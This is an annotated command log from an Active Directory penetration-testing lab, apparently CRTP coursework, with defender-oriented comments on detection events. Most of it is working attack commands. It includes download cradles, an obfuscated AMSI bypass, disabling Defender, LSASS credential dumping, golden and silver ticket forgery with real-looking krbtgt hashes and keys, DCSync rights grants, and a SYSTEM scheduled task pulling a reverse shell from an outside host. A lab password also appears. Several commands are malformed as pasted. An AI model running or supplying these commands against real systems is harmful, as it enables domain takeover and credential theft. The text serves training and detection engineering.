
crtp

# Lab transcript (prompt included): enumerates computer objects and two attributes.
# NOTE(review): LDAP enumeration like this is only observable with DC-side LDAP/ETW
# query logging — confirm that coverage exists before relying on it.
PS C:\Tools\ADModule-master> Get-NetComputer -Properties samaccountname, samaccounttype
# Download-and-execute cradles: fetch script text over cleartext HTTP and run it with
# iex (Invoke-Expression) without writing a file. PowerShell Script Block Logging
# (event 4104) records the executed content; Net.WebClient/iwr traffic to an internal
# host on a non-standard port (8001/8080) is itself a network indicator.
powershell.exe "iex (New-Object Net.WebClient).DownloadString('http://172.16.99.22:8001/payload')"
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.22:8080/PowerView.ps1'))
# Fetches a "script block logging bypass"; the line is truncated as pasted (trailing '.').
iex (iwr http://172.16.100.22:8080/sbloggingbypass.txt -UseBasicParsing).
# Remote command via WinRM (winrs) on dcorp-mgmt: installs a netsh portproxy so that
# dcorp-mgmt:8080 forwards to 172.16.100.22:8080 (pivot). Portproxy rules persist
# across reboots and are listed by 'netsh interface portproxy show all' — worth a
# periodic check on servers that should never forward traffic.
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.100.22"
# Runs the staged Loader.exe on dcorp-mgmt, which pulls SafetyKatz through the local
# proxy and dumps Kerberos keys (sekurlsa::ekeys) from LSASS. The strong signal is an
# unsigned binary from \Users\Public opening a handle to lsass.exe (Sysmon 10 / EDR),
# not the network fetch, which stays on 127.0.0.1.
$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
svcadmin
*ThisisBlasphemyThisisMadness!!
This account is using a service on dcorp-mgmt
2:12:20
# Stages Loader.exe on the local box over cleartext HTTP (file write → Sysmon 11 /
# Defender "downloaded file" telemetry, if enabled).
iwr http://172.16.100.22/Loader.exe -OutFile C:\Users\Public\Loader.exe
# Fetches a logging-bypass script; truncated as pasted (stray ')' and no iex).
iwr http://172.16.100.22/sblogging.txt -UseBasicParsing)
# Obfuscated AMSI bypass. Read through the backticks and -f format strings, it does:
#   Set-Item Variable:1q2uZx ([Ref])
#   [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
#        .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# i.e. it flips the private static amsiInitFailed field so AMSI believes initialisation
# failed and stops scanning script content in this process. The string-splitting and
# backtick obfuscation is a detection signal on its own; the AmsiUtils/amsiInitFailed
# pattern is widely signatured, and 4104 script block logs still capture this text.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
# Dot-sources a helper that checks on which hosts the current user has local admin
# via PowerShell Remoting (each probe is a WinRM logon → 4624 logon type 3 on targets).
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
# Same portproxy pivot as earlier: first pushed remotely over winrs, then the bare
# netsh command for running it directly on the host.
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.100.22"
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.100.22
# Copies Loader.exe to the C$ admin share of dcorp-mgmt / admin-srv / dcorp-dc.
# 'echo F |' answers xcopy's "file or directory?" prompt. Executable writes into
# \Users\Public over an admin share show up as 5145 (object access auditing on the
# share) and Sysmon 11 on the target; lateral tool staging rarely has a legitimate
# counterpart on a DC.
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe /Y
Copy loader: echo F | xcopy C:\AD\Tools\Loader.exe \\admin-srv\C$\Users\Public\Loader.exe
# Disables Defender real-time monitoring (needs local admin). Defender records this in
# its Operational log (event 5001), and Tamper Protection blocks it when enabled; the
# second line is the same command with a typo ('-VerboseS') as pasted.
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableRealtimeMonitoring $true -VerboseS
Copy-Item C:\AD\Tools\Loader.exe \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
c
# Two quoting attempts for staging Loader.exe under \Program Files on dcorp-adminsrv.
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-adminsrv\C$\'Program Files'\Loader.exe /Y
echo F | xcopy C:\AD\Tools\Loader.exe "\\dcorp-adminsrv\C$\Program Files\Loader.exe" /Y
# Adds student522 to Domain Admins. Membership changes to privileged groups are logged
# on the DC (4728/4756 "member added") and should page someone; this is the loudest
# step in the whole set.
net group "Domain Admins" dcorp\student522 /ADD /moneycorp.local
# Golden ticket: forges a TGT for 'svcadmin' with RID 500 (/id:500) signed with the
# krbtgt NTLM hash and injects it into the session (/ptt). Signals: TGS requests
# (4769) with no preceding TGT request (4768) from that host, RC4-encrypted tickets in
# an AES-capable domain, and user/RID mismatches. Mitigation is a double krbtgt key
# rotation, which invalidates every ticket signed with the old key.
Invoke-Mimikatz -Command '"kerberos::golden /user:svcadmin /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /ptt"'
# Same forgery using the krbtgt AES-256 key and realistic lifetimes (/endin:600 min,
# /renewmax:10080 min = 7 days), which removes the RC4 and 10-year-lifetime tells.
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
# Injects a previously saved ticket file.
Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
# misc::cmd — presumably spawns a command prompt that inherits the injected ticket;
# trailing ':' is as pasted.
Invoke-Mimikatz -Command '"misc::cmd:"'
d655572e8c8af4600b90db0e104761c0
# Silver ticket: forges a service ticket for HOST/dcorp-dc using the RC4 key on the
# line above (presumably the DC computer account's). No KDC is contacted, so 4768/4769
# never fire on the DC; what remains is the endpoint logon on dcorp-dc (4624 with a
# forged PAC) and whatever the HOST service is then used for. Rotating the computer
# account password invalidates the key.
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:d655572e8c8af4600b90db0e104761c0 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
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
# Overpass-the-hash: requests a genuine TGT (AS-REQ) for administrator with the
# account's AES-256 key. /opsec shapes the request like a normal Windows client and
# /createnetonly starts a separate logon session so the current one is untouched.
# Because the ticket is real and AES-encrypted, the "RC4 in an AES domain" heuristic
# does not apply; correlate 4768 on the DC by account/source-host pair instead (a
# privileged account requesting a TGT from a student workstation).
C:\AD\Tools\Rubeus.exe asktgt /user:administrator /aes256:e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Find
InterestingDomainAcl ResolveGUIDs
IdentityReferenceName match RDPUsers
sekurlsa::ekeys
# XORs userAccountControl with 4194304 (0x400000 = DONT_REQ_PREAUTH) on
# Control522User, making the account AS-REP-roastable. This is a directory write:
# 4738 "user account changed" on the DC carries the UAC change; alert on any account
# gaining this flag.
Set-DomainObject -Identity Control522User -XOR @{useraccountcontrol=4194304} -Verbose
# Intended to confirm the flag; the filter is malformed as pasted.
Get-DomainUser -PreauthNotRequired | ?{_.SamAccountName -math "Control522User"}
# Persistence on the DC: a weekly scheduled task running as SYSTEM whose action is a
# download cradle for a reverse shell. 4698 "task created" on dcorp-dc with an action
# of powershell.exe -c iex ... is the signal; remote /S creation rides RPC from the
# student host.
schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.22:8080/Invoke-PowerShellTcpEx.ps1''')'"
# Silver ticket for HOST/dcorp-dc (Invoke-Mimikatz form of the BetterSafetyKatz line).
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:d655572e8c8af4600b90db0e104761c0 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Checks whether student522 already holds replication ("DS-Replication-Get-Changes*")
# or GenericAll rights on the domain head — the rights DCSync needs.
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student522") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
# Grants DCSync rights to student522 on the domain object (old and new PowerView
# cmdlets; the second Add-ObjectAcl is truncated and the Add-DomainObjectAcl lines
# carry a stray space in '- PrincipalIdentity' as pasted). Defensively: 5136 "directory
# object modified" on the domain NC for the ACL write, then 4662 with the replication
# GUIDs from a non-DC principal for every DCSync. Any non-DC account holding these
# rights is a standing backdoor — audit the domain head's DACL regularly.
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student522 -Rights DCSync -Verbose
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student522"}
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student522 -Rights DCSync -Ve
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=Local' - PrincipalIdentity student522 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
# Overpass-the-hash for svcadmin with its AES key (see the administrator variant above).
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# Golden ticket asserting Domain Admins membership (/groups:512) with realistic
# lifetimes; some switches are malformed as pasted.
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 ptt"'
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=Local' - PrincipalIdentity student522 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
# Silver ticket for RPCSS/dcorp-dc — presumably to back the WMI calls below — with an
# RC4 key that differs from the HOST ticket's; missing space before '/ptt' as pasted.
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:b5dd4f019ba84bebf7af108447f8e2de /user:Administrator/ptt"'
# Rewrites the WMI namespace security of root\cimv2 on dcorp-dc so student522 can
# query it remotely — an ACL backdoor that survives group/password changes. Namespace
# DACLs are rarely audited; NOTE(review): baseline and diff them on DCs, since nothing
# in the standard Security log flags this write.
Set-RemoteWMI -SamAccountName student522 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
# Remote WMI query used to confirm the access works.
gwmi -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
# Lists ACEs whose trustee matches RDPUsers (the bare fragments earlier in these notes
# are pieces of this command).
Find-InterestingDomainAcl -ResolveGUIDs -IdentityReferenceName match "RDPUsers"
ACE string field order: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
e.g. (A;CI;Permissions String;;;SID)
# Enumerates trusts of every domain in the forest and keeps those whose
# TrustAttributes is FILTER_SIDS, i.e. trusts with SID filtering on (the control that
# blocks SIDHistory-based privilege hops across a trust). Variable references are
# malformed as pasted.
Get-ForestDomain | %{Get-DomainTrust -Domain $.Name} | ?{$.TrustAttributes -eq "FILTER_SIDS"}